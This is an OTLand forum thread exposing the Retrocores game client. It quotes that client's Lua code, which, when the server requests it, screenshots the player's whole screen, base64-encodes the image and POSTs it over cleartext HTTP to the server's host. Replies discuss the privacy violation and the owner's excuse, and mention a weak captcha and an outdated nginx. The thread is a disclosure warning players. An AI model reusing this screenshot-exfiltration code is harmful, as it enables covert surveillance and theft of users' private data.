• There is NO official Otland's Discord server and NO official Otland's server list. The Otland's Staff does not manage any Discord server or server list. Moderators or administrator of any Discord server or server lists have NO connection to the Otland's Staff. Do not get scammed!
  • If you're using Gesior 2012 or MyAAC, please review this thread for information about a serious security vulnerability and a fix.

Retrocores serious privacy violation ! Watch out !

Kekando

Banned User
Joined
Jan 29, 2022
Messages
15
Reaction score
31
Location
Kekland
Retrocores client can screenshot your entire screen.
If you play on this server, remember not to open anything other than the client (photos, online banking, something with personal data) because Marcus and his great function can capture it in the screenshot.


-- modules/game_opcode/opcodes.lua - onExtendedOpcodeReceived
elseif _type == "rr" then -- screenshot requested by server
requestReportScreen(protocol, opcode, buffer) -- send ss to server

----------------------------------------------------------------
-- modules/game_opcode/request_report.lua
local webVerifyToken = ""
local reportData = ""

function doGetReportPath()
local localPlayer = g_game.getLocalPlayer()
local pName = localPlayer:getName()
local configFolder = g_resources.getWriteDir() .. "/report.dat"

return configFolder
end

function doReplyReportRequest(token) -- function to start process of getting screenshot
webVerifyToken = token
local _path = doGetReportPath() -- get report.dat path
local _msg = g_game.doScreenShotGame(_path) -- store on report.dat binary the screenshot (format BMP)

scheduleEvent(compileReport, 1000) -- prepare for sending
end

function readAll(file)
local f = assert(io.open(file, "rb"))
local content = f:read("*all")

f:close()

return content
end

function compileReport()
reportData = readAll(doGetReportPath()) -- read all content of binary file

if reportData then
sendReport() -- send by http request
end
end

HOST = "retrocores.com"
PORT = 80

function sendReport() -- connect to http server
if not HOST then
return
end

local protocolHttp = ProtocolHttp.create()
protocolHttp.onConnect = onConnect_report
protocolHttp.onRecv = onRecv_report
protocolHttp.onError = onError_report

protocolHttp:connect(HOST, PORT)
pwarning("sendReport()")
getNativeSoftwares(5000, true)
end

function onConnect_report(protocol) -- after connect, prepare sending
if not g_game.isOnline() then -- only send screenshot if player is logged in
protocol:disconnect()

return
end

local post = ""
post = post .. "token=" .. webVerifyToken
post = post .. "&topic=" .. "report"
post = post .. "&report=" .. base64_encode(reportData) -- base64 encoding on screenshot binary
local message = ""
message = message .. "POST /client_connections/connections.php HTTP/1.1\r\n"
message = message .. "Host: " .. HOST .. "\r\n"
message = message .. "Accept: /\r\n"
message = message .. "Connection: close\r\n"
message = message .. "Content-Type: application/x-www-form-urlencoded\r\n"
message = message .. "Content-Length: " .. post:len() .. "\r\n\r\n"
message = message .. post

protocol:send(message) -- send
protocol:recv()
pwarning("onConnect_report(protocol)")
end

function onRecv_report(protocol, message)
if string.find(message, "HTTP/1.1 200 OK") then
pwarning("Stats sent to server successfully!")
end

pwarning("onRecv_report(protocol, message)")
pwarning("message: \n" .. message)
protocol:disconnect()

reportData = nil
end

function onError_report(protocol, message, code)
pwarning("Could not send statistics: " .. message)

reportData = nil
end

function urlencode(str)
local function encodeChar(chr)
return string.format("%%%X", string.byte(chr))
end

local output, t = string.gsub(str, "[^%w]", encodeChar)

return output
end

local b = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

function base64_encode(data)
return (data:gsub(".", function (x)
local r = ""
local b = x:byte()

for i = 8, 1, -1 do
r = r .. (b % 2^i - b % 2^(i - 1) > 0 and "1" or "0")
end

return r
end) .. "0000"):gsub("%d%d%d?%d?%d?%d?", function (x)
if #x < 6 then
return ""
end

local c = 0

for i = 1, 6 do
c = c + (x:sub(i, i) == "1" and 2^(6 - i) or 0)
end

return b:sub(c + 1, c + 1)
end) .. ({
"",
"==",
"="
})[#data % 3 + 1]
end

function base64_decode(data)
data = string.gsub(data, "[^" .. b .. "=]", "")

return data:gsub(".", function (x)
if x == "=" then
return ""
end

local r = ""
local f = b:find(x) - 1

for i = 6, 1, -1 do
r = r .. (f % 2^i - f % 2^(i - 1) > 0 and "1" or "0")
end

return r
end):gsub("%d%d%d?%d?%d?%d?%d?%d?", function (x)
if #x ~= 8 then
return ""
end

local c = 0

for i = 1, 8 do
c = c + (x:sub(i, i) == "1" and 2^(8 - i) or 0)
end

return string.char(c)
end)
end

 

Amoaz

Faloria owner
Joined
Jan 14, 2009
Messages
1,515
Reaction score
210
Location
Sweden
When someone builts a captcha based on a static image and javascript (hardcoded css), and then releases a "Full anti-bot client", you know that should be taken with a grain of salt.
But I can not even imagine he went this route. This is a mechanic used in the early 2000s and proved to be too intrusive. And he reinvented it and is now actually breaking data laws.

Should probably investigate the client further to see what more "anti-bot" mechanics he got going.

Here's the captcha, just shows this guy has no idea what computer security is. Takes a few mins to script this and you can go full bruteforce on his login :)
1644697180048.png

Edit: Just saw the code you posted. This is honestly the works of a madman. Not only does he screenshot your screen, he posts it to the server with the awesome algorithm called "I have no idea what I am doing but this looks like encryption".
TLDR: Your screenshots with sensitive data are sent in cleartext to his server, which is running nginx from 2016 with a bunch of CVE's available :)
1644697723719.png
 
Last edited:

Dip Set

Veteran OT User
Joined
Dec 27, 2007
Messages
376
Solutions
2
Reaction score
329
I spoke with Marcus (owner of Retrocores) today. He admitted that this code was in the client, however said it was not currently being used. He said this code was part of his autoscreenshot on skill advance system. He did not delete the conversation so if anyone wants to see the full convo it’s available on retrocores discord.
 

Chriistian.L.B

Intermediate OT User
Joined
Apr 17, 2008
Messages
206
Solutions
4
Reaction score
107
I spoke with Marcus (owner of Retrocores) today. He admitted that this code was in the client, however said it was not currently being used. He said this code was part of his autoscreenshot on skill advance system. He did not delete the conversation so if anyone wants to see the full convo it’s available on retrocores discord.

If it's not being used, why keep it? Invasion of privacy is serious, now he can say anything to defend himself
 

danilopucci

Active Member
Joined
Nov 22, 2019
Messages
67
Solutions
2
Reaction score
39
GitHub
danilopucci
I spoke with Marcus (owner of Retrocores) today. He admitted that this code was in the client, however said it was not currently being used. He said this code was part of his autoscreenshot on skill advance system. He did not delete the conversation so if anyone wants to see the full convo it’s available on retrocores discord.

The otclient has a "feature" to make a screenshot of the map framebuffer, so it would not be necessary to implement a "high level" screenshot
 

Amoaz

Faloria owner
Joined
Jan 14, 2009
Messages
1,515
Reaction score
210
Location
Sweden
I spoke with Marcus (owner of Retrocores) today. He admitted that this code was in the client, however said it was not currently being used. He said this code was part of his autoscreenshot on skill advance system. He did not delete the conversation so if anyone wants to see the full convo it’s available on retrocores discord.
He got a lot of "code not being used" that supports this, heres from init.lua in his client, where he was kind enough to comment for us how he stores the images
unknown.png


Also the endpoint he posts to is still very much active and functional :)
 

Levi999x

AoT
Joined
Dec 14, 2017
Messages
2,141
Solutions
57
Reaction score
1,388
Location
Germany
I spoke with Marcus (owner of Retrocores) today. He admitted that this code was in the client, however said it was not currently being used. He said this code was part of his autoscreenshot on skill advance system. He did not delete the conversation so if anyone wants to see the full convo it’s available on retrocores discord.

yeye for sure

instant ban without a question
 
Last edited:

Silba

is stephany, the josh wife
Joined
Aug 22, 2013
Messages
436
Solutions
9
Reaction score
349
You can get banned for using a VM, using remote desktop and any sort of automation software that doesn't even target his client, this is a spyware client by all means.
I did wonder how long it would take before people started seeing this and providing proof :D

I'm still playing though, because it's legitimately refreshing to not have 99% of the population botting on a long term basis.
 

LordCompi

Banned User
Joined
May 2, 2013
Messages
216
Solutions
4
Reaction score
185

xDD
Post automatically merged:

I spoke with Marcus (owner of Retrocores) today. He admitted that this code was in the client, however said it was not currently being used. He said this code was part of his autoscreenshot on skill advance system. He did not delete the conversation so if anyone wants to see the full convo it’s available on retrocores discord.
nice autoscreenshot, who knows what was autoscreenshoted xD
 

Xampy87

Well-Known Member
Joined
Dec 7, 2008
Messages
116
Reaction score
70
Location
spain
@Marcus Hey bro! we need an answer, this is a BIG REASON TO STOP PLAYING THIS OT, seriosly violating the laws and privacy, we need a statement
 

kay

Legendary OT User
Joined
Apr 23, 2013
Messages
1,061
Solutions
11
Reaction score
1,496
Location
32316,31942,7
YouTube
TibiantisOnline
@Marcus Hey bro! we need an answer, this is a BIG REASON TO STOP PLAYING THIS OT, seriosly violating the laws and privacy, we need a statement
What statement do you expect? It's not a "reason to stop playing", but more like a reason to report it to the police. I wouldn't call it a privacy violation, but literally a crime. If that's true, he basically sold people a trojan. He tricked hundreds of people to install his malicious software and then gained access to anything they do at their computers. Just imagine what he could have stolen when you used that client. Passwords and other credentials? No problem, if they were only shown in your screen at one point. Private conversations OUTSIDE of the client? Sure. Private photos? You probably browsed them one day, so of course. He may have got naked pictures of your gf from the day she did on-camera striptease to you, he may have information of your work projects, he may know everything you do at your comp. Just try to think about every activity you have ever done at your computer, every opened file, app, website, watched porn, every picture, every single time of turning your webcamera on - he may have seen it. And not only seen, but apparently he also stores it. This is insane and I can't believe someone was THAT stupid to put that into his client. I know in the past there were servers that scanned your processes without notice, but this is FAR beyond that. In any civilized country it's a serious threat of prison sentence, doesn't matter whether he used those information or not.
 
Last edited:

Fresh

Quack!
Joined
Oct 21, 2009
Messages
1,771
Solutions
18
Reaction score
501
Location
Poland
Buy n4k3d p!cture$ of gf from the big camera day, paying on Kingdomswap 2 gp, k.
Ok, let me lose, 4 gp, we have valentines today, so let's go crazy!

@ edit : that was not my comment, please remove it, probably Marcus already stole my OTLand details, thanks.
disclaimer : this is joke, thanks
 
Last edited:

snoff

Active Member
Joined
Nov 9, 2017
Messages
23
Reaction score
32
Wow too funny man


I remeber talking to him with other ppl on his dc b4 server started asking questions about this new anti bot features and he himself said he does not record because id be illegal.. maybe he thought taking screen shots is okay who knows


edit
 

Attachments

Last edited:
Top